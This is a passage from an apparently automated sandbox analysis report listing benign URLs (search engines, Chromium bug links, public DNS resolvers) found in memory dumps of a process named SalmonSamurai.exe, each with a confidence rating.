                                          		high
                                          http://www.neti.ee/favicon.icohttp://www.neti.ee/cgi-bin/otsing?query=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                            		high
                                            https://crbug.com/dawn/776SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                              		high
                                              https://yandex.com.tr/gorsel/search?rpt=imageviewhttps://www.yandex.com.tr/chrome/newtabSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                		high
                                                https://crbug.com/dawn/1289SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                  		high
                                                  https://www.so.com/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                    		high
                                                    https://crbug.com/dawn/537SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://dk.search.yahoo.com/favicon.icohttps://dk.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                      		high
                                                      https://at.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                        		high
                                                        http://l.twimg.com/i/hpkp_reportSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                                          		high
                                                          https://nextdns.io/privacySalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                                            		high
                                                            https://malaysia.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                              		high
                                                              http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.icohttps://hladaj.atlas.sk/fulltext/?pSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                		high
                                                                http://www.conduit.com/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                  		high
                                                                  https://crbug.com/tint.SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                    		high
                                                                    https://vn.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                      		high
                                                                      https://developers.google.com/speed/public-dns/privacyGoogleSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                        		high
                                                                        https://www.ask.com/web?q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                          		high
                                                                          https://doh.opendns.com/dns-querySalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                            		high
                                                                            https://ph.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                              		high
                                                                              https://www.ecosia.org/newtab/SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                		high
                                                                                http://www.conduit.com/favicon.icohttp://www.conduit.com/search?q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                  		high
                                                                                  https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                    		high
                                                                                    https://tw.search.yahoo.com/favicon.icohttps://tw.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                      		high
                                                                                      https://www.delfi.lt/favicon.icohttps://www.delfi.lt/paieska/?q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                        		high
                                                                                        http://search.imesh.net/music?hl=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                          		high
                                                                                          https://qc.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                            		high
                                                                                            https://sug.so.360.cn/suggest?encodein=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                              		high
                                                                                              https://cl.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                		high
                                                                                                https://yandex.kz/images/search/?rpt=imageviewSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                  		high
                                                                                                  https://coccoc.com/search#query=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.yandex.by/chrome/newtabSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                      		high
                                                                                                      https://crbug.com/dawn/633SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                        		high
                                                                                                        https://ph.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.walla.co.il/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                            		high
                                                                                                            https://crbug.com/dawn/1071SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                              		high
                                                                                                              https://go.mail.ru/chrome/newtab/SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                		high
                                                                                                                https://id.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://uk.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.neti.ee/cgi-bin/otsing?query=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://petalsearch.com/search?query=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://bugs.chromium.org/p/dawn/issues/detail?id=434timestamp-querySupportSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://ok.hu/gfx/favicon.icohttp://ok.hu/katalogus?q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://bugs.chromium.org/p/dawn/issues/detail?id=690SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://dns.google/dns-querySalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://ph.search.yahoo.com/favicon.icohttps://ph.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://oceanhero.today/web?q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://crbug.com/newCheckIfAudioThreadIsAliveMedia.AudioThreadStatusCreatingSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://ch.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/CloudflareSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://crbug.com/dawn/582SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://crbug.com/dawn/1083SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://crbug.com/dawn/343SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://crbug.com/dawn/342SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://imgs.sapo.pt/images/sapo.icohttp://pesquisa.sapo.pt/?q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://nl.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://in.search.yahoo.com/favicon.icohttps://in.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://search.goo.ne.jp/cdn/common/img/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://crbug.com/tint/1003SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://ak.apnstatic.com/media/images/favicon_search-results.icohttp://dts.search-results.com/sr?lng=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.sogou.com/images/logo/old/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://in.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://search.imesh.net/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://pe.search.yahoo.com/favicon.icohttps://pe.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://crbug.com/dawn/792SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://arianna.libero.it/search/abin/integrata.cgi?query=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://odvr.nic.cz/dohSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://crbug.com/dawn/673SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://imgs.sapo.pt/images/sapo.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://search.privacywall.org/suggest.php?q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://de.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://ar.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://www.quad9.net/home/privacy/SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://www.yandex.ua/chrome/newtabSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://id.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://search.daum.net/search?w=tot&DA=JU5&q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://search.naver.com/search.naver?ie=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                              		high
